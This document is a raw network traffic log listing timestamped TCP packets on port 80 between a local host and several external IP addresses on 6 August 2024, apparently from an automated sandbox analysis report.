Aug 6, 2024 07:57:27.029504061 CEST	49716	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:28.038444996 CEST	49716	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:29.058089972 CEST	49717	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:29.063071012 CEST	80	49717	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:29.063177109 CEST	49717	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:29.074942112 CEST	49717	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:29.079792976 CEST	80	49717	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:29.079899073 CEST	80	49717	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:29.613378048 CEST	80	49717	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:29.613472939 CEST	80	49717	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:29.613620996 CEST	49717	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:30.585300922 CEST	49717	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:31.606194019 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:31.611030102 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:31.611160994 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:31.619751930 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:31.624631882 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:32.128299952 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:32.128405094 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:32.128515005 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:32.128549099 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:32.128588915 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:32.131328106 CEST	49718	80	192.168.2.7	45.33.30.197
Aug 6, 2024 07:57:32.142533064 CEST	80	49718	45.33.30.197	192.168.2.7
Aug 6, 2024 07:57:37.372812986 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:37.377748013 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:37.377832890 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:37.389358997 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:37.394254923 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370721102 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370738983 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370753050 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370774031 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370788097 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370800018 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370812893 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.370908976 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:38.371032953 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:38.371650934 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.371725082 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:38.371764898 CEST	80	49719	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:38.371841908 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:38.897989988 CEST	49719	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:39.916711092 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:39.921555996 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:39.921646118 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:39.933665991 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:39.938493013 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067440987 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067579985 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067609072 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067621946 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067632914 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067635059 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:41.067648888 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067662954 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067662954 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:41.067683935 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067717075 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:41.067732096 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:41.067869902 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.067996979 CEST	80	49720	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:41.068048000 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:41.444956064 CEST	49720	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:42.464935064 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:42.469809055 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:42.469904900 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:42.481730938 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:42.486658096 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:42.486677885 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:43.991574049 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.304035902 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368031025 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368063927 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368099928 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368114948 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368129015 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368143082 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368155003 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368168116 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368190050 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368199110 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368269920 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368439913 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368449926 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368469000 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368486881 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368493080 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.368930101 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.368999004 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.369684935 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.369755030 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.371697903 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.371714115 CEST	80	49721	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:44.371778965 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:44.371792078 CEST	49721	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.018472910 CEST	49722	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.023507118 CEST	80	49722	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:45.023588896 CEST	49722	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.031917095 CEST	49722	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.036809921 CEST	80	49722	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:45.939328909 CEST	80	49722	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:45.939637899 CEST	80	49722	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:45.939722061 CEST	49722	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.942161083 CEST	49722	80	192.168.2.7	141.94.102.188
Aug 6, 2024 07:57:45.947017908 CEST	80	49722	141.94.102.188	192.168.2.7
Aug 6, 2024 07:57:51.056233883 CEST	49723	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:51.061115980 CEST	80	49723	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:51.061184883 CEST	49723	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:51.075206041 CEST	49723	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:51.080039978 CEST	80	49723	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:51.947933912 CEST	80	49723	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:51.948646069 CEST	80	49723	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:51.953299999 CEST	49723	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:52.587409019 CEST	49723	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:53.604950905 CEST	49724	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:53.609910011 CEST	80	49724	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:53.613518000 CEST	49724	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:53.625437021 CEST	49724	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:53.630403042 CEST	80	49724	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:54.504656076 CEST	80	49724	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:54.505537987 CEST	80	49724	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:54.505824089 CEST	49724	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:55.132314920 CEST	49724	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:56.153623104 CEST	49725	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:56.158514977 CEST	80	49725	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:56.160176992 CEST	49725	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:56.171472073 CEST	49725	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:56.176265001 CEST	80	49725	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:56.176384926 CEST	80	49725	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:57.087496996 CEST	80	49725	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:57.087518930 CEST	80	49725	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:57.087563992 CEST	49725	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:57.679379940 CEST	49725	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:58.700723886 CEST	49726	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:58.705622911 CEST	80	49726	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:58.705704927 CEST	49726	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:58.722676039 CEST	49726	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:58.727550983 CEST	80	49726	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:59.609673977 CEST	80	49726	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:59.609739065 CEST	80	49726	154.23.184.207	192.168.2.7
Aug 6, 2024 07:57:59.609915018 CEST	49726	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:59.612879992 CEST	49726	80	192.168.2.7	154.23.184.207
Aug 6, 2024 07:57:59.617769957 CEST	80	49726	154.23.184.207	192.168.2.7
Aug 6, 2024 07:58:04.766177893 CEST	49727	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:04.771152020 CEST	80	49727	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:04.771224022 CEST	49727	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:04.786267042 CEST	49727	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:04.791126966 CEST	80	49727	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:05.283529997 CEST	80	49727	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:05.283917904 CEST	80	49727	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:05.283974886 CEST	49727	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:06.288599968 CEST	49727	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:07.307358980 CEST	49728	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:07.312186003 CEST	80	49728	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:07.312338114 CEST	49728	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:07.323982954 CEST	49728	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:07.329998970 CEST	80	49728	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:07.842675924 CEST	80	49728	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:07.842879057 CEST	80	49728	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:07.843193054 CEST	49728	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:08.835578918 CEST	49728	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:09.857482910 CEST	49729	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:09.862288952 CEST	80	49729	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:09.869528055 CEST	49729	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:09.879456043 CEST	49729	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:09.884383917 CEST	80	49729	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:09.884418964 CEST	80	49729	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:10.399318933 CEST	80	49729	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:10.399329901 CEST	80	49729	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:10.399460077 CEST	49729	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:11.382359982 CEST	49729	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.402187109 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.408910990 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:12.409539938 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.417963982 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.422914982 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:12.929941893 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:12.930077076 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:12.930171013 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.930387974 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:12.930432081 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.935035944 CEST	49730	80	192.168.2.7	194.195.220.41
Aug 6, 2024 07:58:12.940625906 CEST	80	49730	194.195.220.41	192.168.2.7
Aug 6, 2024 07:58:18.107845068 CEST	49731	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:18.112714052 CEST	80	49731	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:18.115502119 CEST	49731	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:18.127945900 CEST	49731	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:18.132802963 CEST	80	49731	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:18.601730108 CEST	80	49731	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:18.605686903 CEST	49731	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:19.632328987 CEST	49731	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:19.637151957 CEST	80	49731	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:20.653578997 CEST	49732	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:20.658422947 CEST	80	49732	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:20.661602020 CEST	49732	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:20.675697088 CEST	49732	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:20.680542946 CEST	80	49732	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:21.301136017 CEST	80	49732	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:21.301225901 CEST	49732	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:22.179203033 CEST	49732	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:22.184053898 CEST	80	49732	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:23.205133915 CEST	49733	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:23.210048914 CEST	80	49733	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:23.210134029 CEST	49733	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:23.223947048 CEST	49733	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:23.228812933 CEST	80	49733	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:23.228872061 CEST	80	49733	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:23.676752090 CEST	80	49733	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:23.677598000 CEST	49733	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:24.726242065 CEST	49733	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:24.731051922 CEST	80	49733	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:25.745563030 CEST	49734	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:25.750376940 CEST	80	49734	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:25.752413988 CEST	49734	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:25.765451908 CEST	49734	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:25.770299911 CEST	80	49734	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:26.231215954 CEST	80	49734	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:26.231342077 CEST	80	49734	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:26.233721972 CEST	49734	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:26.241460085 CEST	49734	80	192.168.2.7	13.248.169.48
Aug 6, 2024 07:58:26.246239901 CEST	80	49734	13.248.169.48	192.168.2.7
Aug 6, 2024 07:58:31.681430101 CEST	49735	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:31.686330080 CEST	80	49735	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:31.689651966 CEST	49735	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:31.700552940 CEST	49735	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:31.705488920 CEST	80	49735	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:32.568193913 CEST	80	49735	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:32.568478107 CEST	80	49735	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:32.568645000 CEST	49735	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:33.210803032 CEST	49735	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:34.229441881 CEST	49736	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:34.234334946 CEST	80	49736	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:34.235564947 CEST	49736	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:34.246884108 CEST	49736	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:34.251753092 CEST	80	49736	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:35.113583088 CEST	80	49736	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:35.113703966 CEST	80	49736	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:35.113758087 CEST	49736	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:35.759896040 CEST	49736	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:36.776680946 CEST	49737	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:36.781717062 CEST	80	49737	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:36.781791925 CEST	49737	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:36.793736935 CEST	49737	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:36.798599005 CEST	80	49737	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:36.798660040 CEST	80	49737	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:37.683037996 CEST	80	49737	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:37.683212996 CEST	80	49737	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:37.683326006 CEST	49737	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:38.305459023 CEST	49737	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:39.323553085 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:39.328515053 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:39.328639030 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:39.336551905 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:39.341456890 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.329940081 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.329972982 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.329979897 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.329992056 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.329998970 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330008984 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330015898 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330024004 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330030918 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330039024 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.330267906 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.330267906 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.335074902 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.335141897 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.335340023 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.549427986 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549443960 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549459934 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549465895 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549478054 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549485922 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549494028 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.549618959 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.549726963 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.550194979 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.550199986 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.550211906 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.550267935 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.550273895 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.550297022 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.550297022 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.550313950 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.551086903 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551126957 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551166058 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551172018 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551191092 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.551198959 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551237106 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.551974058 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551980972 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.551992893 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.552012920 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.552033901 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.552045107 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.552628040 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.554440022 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.554500103 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.554691076 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.639920950 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.639934063 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.640130043 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769304991 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769325018 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769336939 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769450903 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769757032 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769768000 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769795895 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769802094 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769825935 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769838095 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769849062 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769896984 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769915104 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769926071 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769948006 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769951105 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769963980 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.769983053 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.769984007 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.770029068 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.770059109 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.770070076 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.770083904 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.770100117 CEST	80	49738	103.42.108.46	192.168.2.7
Aug 6, 2024 07:58:40.770102978 CEST	49738	80	192.168.2.7	103.42.108.46
Aug 6, 2024 07:58:40.770142078 CEST	49738	80	192.168.2.7	103.42.108.46
